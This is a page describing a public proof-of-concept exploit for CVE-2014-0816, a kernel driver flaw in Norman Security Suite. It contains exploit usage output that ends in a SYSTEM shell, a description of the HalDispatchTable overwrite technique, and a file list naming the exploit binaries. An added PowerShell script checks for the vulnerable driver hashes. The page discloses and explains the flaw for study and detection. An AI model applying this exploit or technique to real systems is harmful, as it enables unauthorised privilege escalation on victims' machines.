
CVE-2014-0816 PoC — Norman Security Suite Privilege Escalation Vulnerability

Associated Vulnerability
Title: Norman Security Suite Privilege Escalation Vulnerability (CVE-2014-0816)
Description: Norman Security Suite is an antivirus suite from the Norwegian company Norman Safeground. The software includes antivirus, firewall, anti-spam and anti-malware functions and provides comprehensive protection of the computer against malicious programs and viruses. Norman Security Suite 10.1 and earlier versions contain a privilege escalation vulnerability. A local attacker can exploit this vulnerability to obtain elevated privileges and execute arbitrary code.
Description
CVE-2014-0816
Readme
CVE-2014-0816
=============

This is an exploit for CVE-2014-0816 ([JVNDB-2014-000026](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000026.html): Norman Security Suite vulnerable to privilege escalation). 

This exploit launches CMD.exe with SYSTEM privileges from a non-administrator account by exploiting a vulnerability in an IOCTL handler of ngs.sys / ngs64.sys.

Usage
-----------------
    C:\Users\user\Desktop> exploit_ngs.exe
    [*] Exploit Norman General Security Driver (ngs.sys / ngs64.sys)
    [*] Target file version: ver 5.0.740.0.
    [*] An address file was created at C:\Users\user\Desktop\address.bin.
    [*] Shellcode is located at 000000013F9357D0.
    [*] The device was opened as 0000000000000044.
    [*] The address file was opened as FFFFFFFF80000558.
    [+] HalDispatchTable[1] is located at FFFFF800033FDC68.
    [+] HalDispatchTable[1] was altered.
    [+] Shellcode was executed.
    [+] The SYSTEM shell was launched.
    [*] Press any key to finish this program.
 
Then you will see a new console.

    Microsoft Windows [Version 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
    
    C:\Users\user\Desktop>whoami
    nt authority\system

    
The vulnerability allows an attacker to overwrite an arbitrary address with an arbitrary value, so this exploit sets HalDispatchTable[1] to the address of shellcode that escalates the privileges of the current process to SYSTEM.

![demo_win7_x64](/img/demo_win7_x64.png)

This vulnerability should be exploitable on all platforms from Windows XP to 8, both x86 and x64, but this exploit is designed for and tested on certain platforms only (for example, it will not function on Windows 8 because of SMEP).

Tested Platforms
-----------------
- Norman Security Suite 10.1
    - 2ad60239e6637132fcaa816348c6ec3b358db49e (ngs.sys)
    - 21da5771db8308292c9d88a16b73260be40f0b09 (ngs.sys)
    - d2e34871d4d0fe04087e89f9c9f3599193b8258a (ngs64.sys)
    - fa1ed5997466263c8f91d8a4f3a80e3712cf777e (ngs64.sys)
- Windows XP (x86) SP3 with Guest privilege
- Windows 7 (x86/x64) SP1 with Guest privilege
- Windows 10 (x64) Build 14393 with Guest privilege (SMEP disabled)
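The hash list above is the most useful artefact for a defender: it identifies the exact driver builds the author confirmed as exploitable. The script below is an added example, not part of the PoC repository, that inventories ngs.sys / ngs64.sys on a Windows host, compares their hashes with the four listed above, reports the file version (the usage output above shows 5.0.740.0 as the targeted build) and checks whether the driver is currently running. Two assumptions: the driver is installed under `%SystemRoot%\System32\drivers`, and the 40-hex-digit hashes in the README are SHA-1.

```powershell
# Added example (not from the PoC repository): look for the ngs.sys / ngs64.sys
# builds that this README lists as tested-vulnerable for CVE-2014-0816.
# Assumptions: the driver lives under %SystemRoot%\System32\drivers and the
# 40-hex-digit hashes quoted in the README are SHA-1.

$KnownVulnerableSha1 = @(
    '2ad60239e6637132fcaa816348c6ec3b358db49e',  # ngs.sys   (from the README)
    '21da5771db8308292c9d88a16b73260be40f0b09',  # ngs.sys   (from the README)
    'd2e34871d4d0fe04087e89f9c9f3599193b8258a',  # ngs64.sys (from the README)
    'fa1ed5997466263c8f91d8a4f3a80e3712cf777e'   # ngs64.sys (from the README)
)

function Test-NormanDriver {
    [CmdletBinding()]
    param(
        # Directory searched for the driver files; assumed default location.
        [string]$DriverDir = (Join-Path $env:SystemRoot 'System32\drivers'),
        # Hashes treated as known-vulnerable; defaults to the README's list.
        [string[]]$VulnerableHashes = $KnownVulnerableSha1
    )

    $results = foreach ($name in 'ngs.sys', 'ngs64.sys') {
        $path = Join-Path $DriverDir $name
        if (-not (Test-Path -LiteralPath $path)) { continue }

        $sha1    = (Get-FileHash -LiteralPath $path -Algorithm SHA1).Hash.ToLower()
        $version = (Get-Item -LiteralPath $path).VersionInfo.FileVersion
        $known   = $VulnerableHashes -contains $sha1

        # A vulnerable file on disk matters most when the driver is actually
        # loaded, since the IOCTL handler is only reachable through its device.
        $running = @(Get-CimInstance Win32_SystemDriver -Filter "PathName LIKE '%$name'" -ErrorAction SilentlyContinue |
                     Where-Object State -eq 'Running').Count -gt 0

        [pscustomobject]@{
            File            = $path
            FileVersion     = $version
            Sha1            = $sha1
            KnownVulnerable = $known
            Running         = $running
        }
    }
    return $results
}

# Usage: print one row per Norman driver found, flagging known-vulnerable builds.
Test-NormanDriver | Format-Table -AutoSize
```

A hash that is not in the list is not evidence of a fixed driver: the README only records the builds the author tested, and says nothing about which version corrected the IOCTL handler. Treat any host where `KnownVulnerable` is true as confirmed exposed, and verify other `FileVersion` values against the vendor's advisory rather than against this list.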

License
-----------------
This software is released under the MIT License, see LICENSE.

File Snapshot

    [4.0K] /data/pocs/45b7d08ac23f49426016ad17f854b2fe293818a8
    ├── [4.0K] exploit_ngs
    │   ├── [4.0K] exploit_ngs
    │   │   ├── [ 11K] exploit_ngs.cpp
    │   │   ├── [7.8K] exploit_ngs.vcxproj
    │   │   ├── [1.0K] exploit_ngs.vcxproj.filters
    │   │   └── [4.0K] shellcode.asm
    │   ├── [1.3K] exploit_ngs.sln
    │   ├── [4.0K] Release
    │   │   ├── [162K] exploit_ngs_7.exe
    │   │   └── [162K] exploit_ngs_XP.exe
    │   └── [4.0K] x64
    │       └── [4.0K] Release
    │           ├── [248K] exploit_ngs_10.exe
    │           └── [184K] exploit_ngs_7.exe
    ├── [4.0K] img
    │   └── [417K] demo_win7_x64.png
    ├── [1.0K] LICENSE.md
    └── [2.2K] README.md

    6 directories, 12 files